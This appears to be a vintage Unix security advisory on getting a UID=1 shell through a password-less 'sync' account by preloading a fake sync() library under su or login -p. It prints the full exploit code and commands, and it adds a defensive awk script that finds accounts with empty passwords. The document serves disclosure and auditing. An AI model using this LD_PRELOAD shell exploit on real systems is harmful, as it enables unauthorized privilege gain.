COMMAND

    sync(8)

SYSTEMS AFFECTED

    Any system with a password-less "sync" account.

PROBLEM

    Basically, since "su" passes the full environment, and since "login"
    can be told to do so with the "-p" option, you can play games with
    the environment variables LD_LIBRARY_PATH, LD_PRELOAD, IFS, and so
    on. For example, to get a UID=1 shell on any system with a
    password-less "sync" account:

        % cat > sync.c
        #include <unistd.h>

        /* interposes on the real sync() when this object is preloaded */
        void sync(void)
        {
            execl("/bin/sh", "sh", (char *)0);
        }
        ^D
        % cc -O -R -pic -c sync.c
        % ld -assert pure-text sync.o
        % mv a.out buglib.so.1.1
        % setenv LD_PRELOAD $cwd/buglib.so.1.1

    Then execute:

        % /bin/login -p sync

    or equivalently:

        % /usr/bin/su sync

    Poof! You now have a UID=1 shell. First we set up a library with a
    fake sync() call. The LD_PRELOAD variable is an undocumented one
    that causes any libraries listed to be loaded *before* anything
    else. (You could do the same with LD_LIBRARY_PATH, but you would
    have to provide a whole C library - this is easier.)

SOLUTION

    Give "sync" a password!
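    As an added example that is not part of the original advisory, a POSIX
    shell audit that finds the precondition the advisory depends on: entries
    in a passwd-format file whose password field is empty. The sample file
    below is constructed, and the hashes in it are placeholders.

```shell
#!/bin/sh
# Audit a passwd/shadow-format file for accounts with an empty password
# field. Added example, not from the advisory; the sample is constructed.

# list_passwordless FILE
# Prints "user:uid" for every entry whose second field (the hash) is empty.
# Locked or shadowed entries ("*", "!", "x") are not flagged: only an
# empty field lets "login" or "su" proceed without a password.
list_passwordless() {
    awk -F: '
        # skip comments and malformed or blank lines
        /^#/ || NF < 2 { next }
        # empty second field: no password required
        $2 == "" { print $1 ":" $3 }
    ' "$1"
}

# has_passwordless FILE
# Exit status 0 if at least one password-less entry exists, 1 otherwise,
# so it can be used directly in a cron or login-time check.
has_passwordless() {
    [ -n "$(list_passwordless "$1")" ]
}

# Constructed sample in the style of a SunOS 4 passwd file. "sync" has
# UID 1 as in the advisory; the hash strings are placeholders, not real.
SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT
cat > "$SAMPLE_PASSWD" <<'EOF'
# user:password:uid:gid:gecos:home:shell
root:EXAMPLEHASH:0:1:Operator:/:/bin/csh
sync::1:1::/:/bin/sync
daemon:*:2:2::/:
guest::100:100:Guest account:/tmp:/bin/sh
shadowed:x:1000:1000:placeholder:/home/shadowed:/bin/sh
EOF

# Reports "sync:1" and "guest:100" for the sample above.
list_passwordless "$SAMPLE_PASSWD"
```

    On a real system point it at /etc/passwd and, where one exists, the
    shadow file, since an "x" in passwd only defers the check to shadow.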